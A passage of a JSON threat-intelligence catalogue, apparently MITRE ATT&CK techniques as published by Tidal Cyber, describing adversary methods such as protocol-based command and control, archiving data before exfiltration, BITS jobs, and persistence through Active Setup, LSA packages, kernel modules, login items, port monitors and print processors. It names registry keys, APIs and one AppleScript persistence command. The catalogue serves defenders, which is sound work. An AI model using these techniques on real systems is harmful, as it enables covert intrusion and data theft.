"uuid": "9a21ec7b-9714-4073-9bf3-4df41995c698",
"value": "Web Protocols"
},
{
"description": "Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nAdversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP. ",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
},
{
"dest-uuid": "5c6c3492-5dbc-43ee-a3f2-ba1976d3b379",
"type": "similar"
},
{
"dest-uuid": "a4f21b08-bf5b-4ba3-af69-cce01a467859",
"type": "similar"
},
{
"dest-uuid": "350fd3f9-2d62-498f-be62-fc4b9907ff02",
"type": "similar"
},
{
"dest-uuid": "9a21ec7b-9714-4073-9bf3-4df41995c698",
"type": "similar"
}
],
"uuid": "8a7afe43-b814-41b3-8bd8-e1301b8ba5b4",
"value": "Application Layer Protocol"
},
{
"description": "Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.<sup>[[Prevailion DarkWatchman 2021](https://app.tidalcyber.com/references/449e7b5c-7c62-4a63-a676-80026a597fc9)]</sup> For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://app.tidalcyber.com/technique/9e945aa5-3883-4537-a767-f49bdcce26c7)) to evade.<sup>[[ESET Grandoreiro April 2020](https://app.tidalcyber.com/references/d6270492-986b-4fb6-bdbc-2e364947847c)]</sup>\n\nAdversaries typically abuse system features for this type of enumeration. For example, they may gather information through native system features such as [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c) commands and [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) functions.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "3b2f435a-8666-43b5-9883-f2808eebd726",
"value": "Application Window Discovery"
},
{
"description": "An adversary may compress or encrypt data that is collected prior to exfiltration using a custom method. Adversaries may choose to use custom archival methods, such as encryption with XOR or stream ciphers implemented with no external library or utility references. Custom implementations of well-known compression algorithms have also been used.<sup>[[ESET Sednit Part 2](https://app.tidalcyber.com/references/aefb9eda-df5a-437f-af2a-ec1b6c04628b)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1560.003"
},
"related": [
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
}
],
"uuid": "41da2363-af05-46b8-990e-2cc749b5aac8",
"value": "Archive via Custom Method"
},
{
"description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://app.tidalcyber.com/technique/68fed1c9-e060-4c4d-83d9-d8c817893d65) rarfile <sup>[[PyPI RAR](https://app.tidalcyber.com/references/e40d1cc8-b8c7-4f43-b6a7-c50a4f7bf1f0)]</sup>, libzip <sup>[[libzip](https://app.tidalcyber.com/references/e7008738-101c-4903-a9fc-b0bd28d66069)]</sup>, and zlib <sup>[[Zlib Github](https://app.tidalcyber.com/references/982bcacc-afb2-4bbb-9197-f44d765b9e07)]</sup>. Most libraries include functionality to encrypt and/or compress data.\n\nSome archival libraries are preinstalled on systems, such as bzip2 on macOS and Linux, and zip on Windows. Note that the libraries are different from the utilities. The libraries can be linked against when compiling, while the utilities require spawning a subshell, or a similar execution mechanism.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1560.002"
},
"related": [
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
}
],
"uuid": "ccf06b4a-bc33-4db1-bc66-74a0a7c31451",
"value": "Archive via Library"
},
{
"description": "Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport.\n\nAdversaries may abuse various utilities to compress or encrypt data before exfiltration. Some third party utilities may be preinstalled, such as <code>tar</code> on Linux and macOS or <code>zip</code> on Windows systems. \n\nOn Windows, <code>diantz</code> or <code> makecab</code> may be used to package collected files into a cabinet (.cab) file. <code>diantz</code> may also be used to download and compress files from remote locations (i.e. [Remote Data Staging](https://app.tidalcyber.com/technique/cf76b79c-8226-4137-b3dd-8f516611b928)).<sup>[[diantz.exe_lolbas](https://app.tidalcyber.com/references/66652db8-5594-414f-8a6b-83d708a0c1fa)]</sup> <code>xcopy</code> on Windows can copy files and directories with a variety of options. Additionally, adversaries may use [certutil](https://app.tidalcyber.com/software/2fe21578-ee31-4ee8-b6ab-b5f76f97d043) to Base64 encode collected data before exfiltration. \n\nAdversaries may use also third party utilities, such as 7-Zip, WinRAR, and WinZip, to perform similar activities.<sup>[[7zip Homepage](https://app.tidalcyber.com/references/fc1396d2-1ffd-4fd9-ba60-3f6e0a9dfffb)]</sup><sup>[[WinRAR Homepage](https://app.tidalcyber.com/references/c1334e4f-67c8-451f-b50a-86003f6e3d3b)]</sup><sup>[[WinZip Homepage](https://app.tidalcyber.com/references/dc047688-2ea3-415c-b516-06542048b049)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1560.001"
},
"related": [
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
}
],
"uuid": "3042a254-a2a9-4cb9-9939-087a24c64907",
"value": "Archive via Utility"
},
{
"description": "An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.\n\nBoth compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
},
{
"dest-uuid": "41da2363-af05-46b8-990e-2cc749b5aac8",
"type": "similar"
},
{
"dest-uuid": "ccf06b4a-bc33-4db1-bc66-74a0a7c31451",
"type": "similar"
},
{
"dest-uuid": "3042a254-a2a9-4cb9-9939-087a24c64907",
"type": "similar"
}
],
"uuid": "ebd3f870-c513-4fb0-b133-15ffc1f91db2",
"value": "Archive Collected Data"
},
{
"description": "An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.\n\nMalware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
}
],
"uuid": "2be5c67a-edae-4083-8b6d-f99eaa622ed4",
"value": "Audio Capture"
},
{
"description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. In cloud-based environments, adversaries may also use cloud APIs, command line interfaces, or extract, transform, and load (ETL) services to automatically collect data. This functionality could also be built into remote access tools. \n\nThis technique may incorporate use of other techniques such as [File and Directory Discovery](https://app.tidalcyber.com/technique/1492c4ba-c933-47b8-953d-6de3db8cfce8) and [Lateral Tool Transfer](https://app.tidalcyber.com/technique/3dea57fc-3131-408b-a1fd-ff2eea1d858f) to identify and move files, as well as [Cloud Service Dashboard](https://app.tidalcyber.com/technique/315ce434-ad6d-4dae-a1dd-6db944a44422) and [Cloud Storage Object Discovery](https://app.tidalcyber.com/technique/92761d92-a288-4407-a112-bb2720f07d07) to identify resources in cloud environments.",
"meta": {
"platforms": [
"IaaS",
"Linux",
"macOS",
"SaaS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
}
],
"uuid": "107ad6c5-79b1-468c-9519-1578bee2ac49",
"value": "Automated Collection"
},
{
"description": "Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. <sup>[[Cisco Traffic Mirroring](https://app.tidalcyber.com/references/1a5c86ad-d3b1-408b-a6b4-14ca0e572020)]</sup><sup>[[Juniper Traffic Mirroring](https://app.tidalcyber.com/references/a6f62986-0b62-4316-b762-021f1bb14903)]</sup>\n\nAdversaries may abuse traffic mirroring to mirror or redirect network traffic through other infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://app.tidalcyber.com/technique/b9d60848-388e-444c-9f22-2267ea61b5e9) or [Patch System Image](https://app.tidalcyber.com/technique/630a17c1-0176-4764-8f5c-a83f4f3e980f).<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup><sup>[[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)]</sup>\n\nMany cloud-based environments also support traffic mirroring. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.<sup>[[AWS Traffic Mirroring](https://app.tidalcyber.com/references/6b77a2f3-39b8-4574-8dee-cde7ba9debff)]</sup><sup>[[GCP Packet Mirroring](https://app.tidalcyber.com/references/c91c6399-3520-4410-936d-48c3b13235ca)]</sup><sup>[[Azure Virtual Network TAP](https://app.tidalcyber.com/references/3f106d7e-f101-4adb-bbd1-d8c04a347f85)]</sup>\n\nAdversaries may use traffic duplication in conjunction with [Network Sniffing](https://app.tidalcyber.com/technique/bbad213d-477d-43bf-9501-ad7d74bac323), [Input Capture](https://app.tidalcyber.com/technique/5ee96331-a7b7-4c32-a8f1-3fb164078f5f), or [Adversary-in-the-Middle](https://app.tidalcyber.com/technique/d98dbf30-c454-42ff-a9f3-2cd3319cc0d9) depending on the goals and objectives of the adversary.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1020.001"
},
"related": [
{
"dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023",
"type": "uses"
}
],
"uuid": "c2fc2776-e674-46ff-8b8d-ecc90b8b1c26",
"value": "Traffic Duplication"
},
{
"description": "Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection. \n\nWhen automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://app.tidalcyber.com/technique/89203cae-d3f1-4eef-9b5a-29042eb05d19) and [Exfiltration Over Alternative Protocol](https://app.tidalcyber.com/technique/192d25ea-bae1-48e4-88de-e0acd481ab88).",
"meta": {
"platforms": [
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023",
"type": "uses"
},
{
"dest-uuid": "c2fc2776-e674-46ff-8b8d-ecc90b8b1c26",
"type": "similar"
}
],
"uuid": "26abc19f-5968-45f1-aa1f-f35863a2f804",
"value": "Automated Exfiltration"
},
{
"description": "Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66) (COM).<sup>[[Microsoft COM](https://app.tidalcyber.com/references/edcd917d-ca5b-4e5c-b3be-118e828abe97)]</sup><sup>[[Microsoft BITS](https://app.tidalcyber.com/references/3d925a69-35f3-4337-8e1e-275de4c1783e)]</sup> BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.\n\nThe interface to create and manage BITS jobs is accessible through [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) and the [BITSAdmin](https://app.tidalcyber.com/software/52a20d3d-1edd-4f17-87f0-b77c67d260b4) tool.<sup>[[Microsoft BITS](https://app.tidalcyber.com/references/3d925a69-35f3-4337-8e1e-275de4c1783e)]</sup><sup>[[Microsoft BITSAdmin](https://app.tidalcyber.com/references/5b8c2a8c-f01e-491a-aaf9-504ee7a1caed)]</sup>\n\nAdversaries may abuse BITS to download (e.g. [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242)), execute, and even clean up after running malicious code (e.g. [Indicator Removal](https://app.tidalcyber.com/technique/fa1507f1-c763-4af1-8bd9-a2fb8f7904be)). BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.<sup>[[CTU BITS Malware June 2016](https://app.tidalcyber.com/references/db98b15c-399d-4a4c-8fa6-5a4ff38c3853)]</sup><sup>[[Mondok Windows PiggyBack BITS May 2007](https://app.tidalcyber.com/references/7dd03a92-11b8-4b8a-9d34-082ecf09a6e4)]</sup><sup>[[Symantec BITS May 2007](https://app.tidalcyber.com/references/e5962c87-0d42-46c2-8757-91f264fc570f)]</sup> BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).<sup>[[PaloAlto UBoatRAT Nov 2017](https://app.tidalcyber.com/references/235a1129-2f35-4861-90b8-1f761d89b0f9)]</sup><sup>[[CTU BITS Malware June 2016](https://app.tidalcyber.com/references/db98b15c-399d-4a4c-8fa6-5a4ff38c3853)]</sup>\n\nBITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://app.tidalcyber.com/technique/192d25ea-bae1-48e4-88de-e0acd481ab88).<sup>[[CTU BITS Malware June 2016](https://app.tidalcyber.com/references/db98b15c-399d-4a4c-8fa6-5a4ff38c3853)]</sup>",
"meta": {
"platforms": [
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "6b278e5d-7383-42a4-9425-2da79bbe43e0",
"value": "BITS Jobs"
},
{
"description": "Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.<sup>[[Klein Active Setup 2010](https://app.tidalcyber.com/references/cbdd6290-1dda-48af-a101-fb3db6581276)]</sup> These programs will be executed under the context of the user and will have the account's associated permissions level.\n\nAdversaries may abuse Active Setup by creating a key under <code> HKLM\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\</code> and setting a malicious value for <code>StubPath</code>. This value will serve as the program that will be executed when a user logs into the computer.<sup>[[Mandiant Glyer APT 2010](https://app.tidalcyber.com/references/bb336a6f-d76e-4535-ba81-0c7932ae91e3)]</sup><sup>[[Citizenlab Packrat 2015](https://app.tidalcyber.com/references/316f347f-3e92-4861-a075-db64adf6b6a8)]</sup><sup>[[FireEye CFR Watering Hole 2012](https://app.tidalcyber.com/references/6108ab77-e4fd-43f2-9d49-8ce9c219ca9c)]</sup><sup>[[SECURELIST Bright Star 2015](https://app.tidalcyber.com/references/59cba16f-91ed-458c-91c9-5b02c03678f5)]</sup><sup>[[paloalto Tropic Trooper 2016](https://app.tidalcyber.com/references/47524b17-1acd-44b1-8de5-168369fa9455)]</sup>\n\nAdversaries can abuse these components to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd) to make the Registry entries look as if they are associated with legitimate programs.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1547.014"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "8bd564d2-a3f1-4367-8631-a2d2cb3a1f46",
"value": "Active Setup"
},
{
"description": "Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.<sup>[[MSDN Authentication Packages](https://app.tidalcyber.com/references/e9bb8434-9b6d-4301-bfe2-5c83ceabb020)]</sup>\n\nAdversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location <code>HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\</code> with the key value of <code>\"Authentication Packages\"=&lt;target binary&gt;</code>. The binary will then be executed by the system when the authentication packages are loaded.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1547.002"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "7ede5868-1109-4f22-abc7-9495658f7866",
"value": "Authentication Package"
},
{
"description": "Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.<sup>[[Linux Kernel Programming](https://app.tidalcyber.com/references/70f31f19-e0b3-40b1-b8dd-6667557bb334)]</sup> \n\nWhen used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://app.tidalcyber.com/technique/cf2b56f6-3ebd-48ec-b9d9-835397acef89) that run with the highest operating system privilege (Ring 0).<sup>[[Linux Kernel Module Programming Guide](https://app.tidalcyber.com/references/ceefe610-0b26-4307-806b-17313d570511)]</sup> Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.<sup>[[iDefense Rootkit Overview](https://app.tidalcyber.com/references/c1aef861-9e31-42e6-a2eb-5151b056762b)]</sup>\n\nKernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.<sup>[[System and kernel extensions in macOS](https://app.tidalcyber.com/references/e5c4974d-dfd4-4c1c-ba4c-b6fb276effac)]</sup>\n\nSince macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as \"Legacy System Extensions\" since there is no System Extension for Kernel Programming Interfaces.<sup>[[Apple Kernel Extension Deprecation](https://app.tidalcyber.com/references/86053c5a-f2dd-4eb3-9dc2-6a6a4e1c2ae5)]</sup>\n\nAdversaries can use LKMs and kexts to conduct [Persistence](https://app.tidalcyber.com/tactics/ec4f9786-c00c-430a-bc6d-0d0d22fdd393) and/or [Privilege Escalation](https://app.tidalcyber.com/tactics/b17dde68-dbcf-4cfd-9bb8-be014ec65c37) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.<sup>[[Volatility Phalanx2](https://app.tidalcyber.com/references/6149f9ed-9218-489b-b87c-8208de89be68)]</sup><sup>[[CrowdStrike Linux Rootkit](https://app.tidalcyber.com/references/eb3590bf-ff12-4ccd-bf9d-cf8eacd82135)]</sup><sup>[[GitHub Reptile](https://app.tidalcyber.com/references/6e8cc88a-fb3f-4464-9380-868f597def6e)]</sup><sup>[[GitHub Diamorphine](https://app.tidalcyber.com/references/92993055-d2e6-46b2-92a3-ad70b62e4cc0)]</sup><sup>[[RSAC 2015 San Francisco Patrick Wardle](https://app.tidalcyber.com/references/7e3f3dda-c407-4b06-a6b0-8b72c4dad6e6)]</sup><sup>[[Synack Secure Kernel Extension Broken](https://app.tidalcyber.com/references/647f6be8-fe95-4045-8778-f7d7ff00c96c)]</sup><sup>[[Securelist Ventir](https://app.tidalcyber.com/references/5e4e82c0-16b6-43bc-a70d-6b8d55aaef52)]</sup><sup>[[Trend Micro Skidmap](https://app.tidalcyber.com/references/53291621-f0ad-4cb7-af08-78b96eb67168)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1547.006"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "74e2b24b-3bf7-4361-bc07-983bffe674f7",
"value": "Kernel Modules and Extensions"
},
{
"description": "Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.<sup>[[Open Login Items Apple](https://app.tidalcyber.com/references/46a480eb-52d1-44c9-8b44-7e516b27cf82)]</sup> Login items can be added via a shared file list or Service Management Framework.<sup>[[Adding Login Items](https://app.tidalcyber.com/references/5ab3e243-37a6-46f1-b28f-6846ecdef0ae)]</sup> Shared file list login items can be set using scripting languages such as [AppleScript](https://app.tidalcyber.com/technique/9f06ef9b-d587-41d3-8fc8-7d539dac5701), whereas the Service Management Framework uses the API call <code>SMLoginItemSetEnabled</code>.\n\nLogin items installed using the Service Management Framework leverage <code>launchd</code>, are not visible in the System Preferences, and can only be removed by the application that created them.<sup>[[Adding Login Items](https://app.tidalcyber.com/references/5ab3e243-37a6-46f1-b28f-6846ecdef0ae)]</sup><sup>[[SMLoginItemSetEnabled Schroeder 2013](https://app.tidalcyber.com/references/ad14bad2-95c8-49b0-9777-e464fc8359a0)]</sup> Login items created using a shared file list are visible in System Preferences, can hide the application when it launches, and are executed through LaunchServices, not launchd, to open applications, documents, or URLs without using Finder.<sup>[[Launch Services Apple Developer](https://app.tidalcyber.com/references/9973ceb1-2fee-451b-a512-c544671ee9fd)]</sup> Users and applications use login items to configure their user environment to launch commonly used services or applications, such as email, chat, and music applications.\n\nAdversaries can utilize [AppleScript](https://app.tidalcyber.com/technique/9f06ef9b-d587-41d3-8fc8-7d539dac5701) and [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) calls to create a login item to spawn malicious executables.<sup>[[ELC Running at startup](https://app.tidalcyber.com/references/11ee6303-5103-4063-a765-659ead217c6c)]</sup> Prior to version 10.5 on macOS, adversaries can add login items by using [AppleScript](https://app.tidalcyber.com/technique/9f06ef9b-d587-41d3-8fc8-7d539dac5701) to send an Apple events to the “System Events” process, which has an AppleScript dictionary for manipulating login items.<sup>[[Login Items AE](https://app.tidalcyber.com/references/d15943dd-d11c-4af2-a3ac-9ebe168a7526)]</sup> Adversaries can use a command such as <code>tell application “System Events” to make login item at end with properties /path/to/executable</code>.<sup>[[Startup Items Eclectic](https://app.tidalcyber.com/references/397be6f9-a109-4185-85f7-8d994fb31eaa)]</sup><sup>[[hexed osx.dok analysis 2019](https://app.tidalcyber.com/references/96f9d36a-01a5-418e-85f4-957e58d49c1b)]</sup><sup>[[Add List Remove Login Items Apple Script](https://app.tidalcyber.com/references/13773d75-6fc1-4289-bf45-6ee147279052)]</sup> This command adds the path of the malicious executable to the login item file list located in <code>~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm</code>.<sup>[[Startup Items Eclectic](https://app.tidalcyber.com/references/397be6f9-a109-4185-85f7-8d994fb31eaa)]</sup> Adversaries can also use login items to launch executables that can be used to control the victim system remotely or as a means to gain privilege escalation by prompting for user credentials.<sup>[[objsee mac malware 2017](https://app.tidalcyber.com/references/08227ae5-4086-4c31-83d9-459c3a097754)]</sup><sup>[[CheckPoint Dok](https://app.tidalcyber.com/references/8c178fd8-db34-45c6-901a-a8b2c178d809)]</sup><sup>[[objsee netwire backdoor 2019](https://app.tidalcyber.com/references/866c5305-8629-4f09-8dfe-192c8573ffb0)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1547.015"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "6556e1cb-87d0-4e67-9d5c-343d1eddf430",
"value": "Login Items"
},
{
"description": "Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.<sup>[[Microsoft Security Subsystem](https://app.tidalcyber.com/references/27dae010-e3b3-4080-8039-9f89a29607e6)]</sup>\n\nAdversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://app.tidalcyber.com/technique/1085d0c6-4ff3-45f1-8e0c-d8f334f4ba68)), an adversary can use LSA operations to continuously execute malicious payloads.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1547.008"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "bce86020-2851-4b01-97a9-e51a6b23ea68",
"value": "LSASS Driver"
},
{
"description": "Adversaries may use port monitors to run an adversary supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the <code>AddMonitor</code> API call to set a DLL to be loaded at startup.<sup>[[AddMonitor](https://app.tidalcyber.com/references/8c1a719e-6ca1-4b41-966d-ddb87c849fe0)]</sup> This DLL can be located in <code>C:\\Windows\\System32</code> and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions.<sup>[[Bloxham](https://app.tidalcyber.com/references/b212d16f-5347-49ab-8339-432b4fd1ef50)]</sup> Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to <code>HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors</code>. \n\nThe Registry key contains entries for the following:\n\n* Local Port\n* Standard TCP/IP Port\n* USB Monitor\n* WSD Port\n\nAdversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1547.010"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "ffd9430b-c727-47f4-a1f0-b1d4f8c29740",
"value": "Port Monitors"
},
{
"description": "Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, `spoolsv.exe`, during boot.<sup>[[Microsoft Intro Print Processors](https://app.tidalcyber.com/references/ba04b0d0-1c39-5f48-824c-110ee7affbf3)]</sup>\n\nAdversaries may abuse the print spooler service by adding print processors that load malicious DLLs at startup. A print processor can be installed through the <code>AddPrintProcessor</code> API call with an account that has <code>SeLoadDriverPrivilege</code> enabled. Alternatively, a print processor can be registered to the print spooler service by adding the <code>HKLM\\SYSTEM\\\\[CurrentControlSet or ControlSet001]\\Control\\Print\\Environments\\\\[Windows architecture: e.g., Windows x64]\\Print Processors\\\\[user defined]\\Driver</code> Registry key that points to the DLL.\n\nFor the malicious print processor to be correctly installed, the payload must be located in the dedicated system print-processor directory, that can be found with the <code>GetPrintProcessorDirectory</code> API call, or referenced via a relative path from this directory.<sup>[[Microsoft AddPrintProcessor May 2018](https://app.tidalcyber.com/references/12c7160b-c93c-44cd-b108-68d4823aec8c)]</sup> After the print processors are installed, the print spooler service, which starts during boot, must be restarted in order for them to run.<sup>[[ESET PipeMon May 2020](https://app.tidalcyber.com/references/cbc09411-be18-4241-be69-b718a741ed8c)]</sup>\n\nThe print spooler service runs under SYSTEM level permissions, therefore print processors installed by an adversary may run under elevated privileges.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1547.012"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
}
],
"uuid": "f7544b99-d596-43dd-ab12-3844756f3ad7",
"value": "Print Processors"
},
{
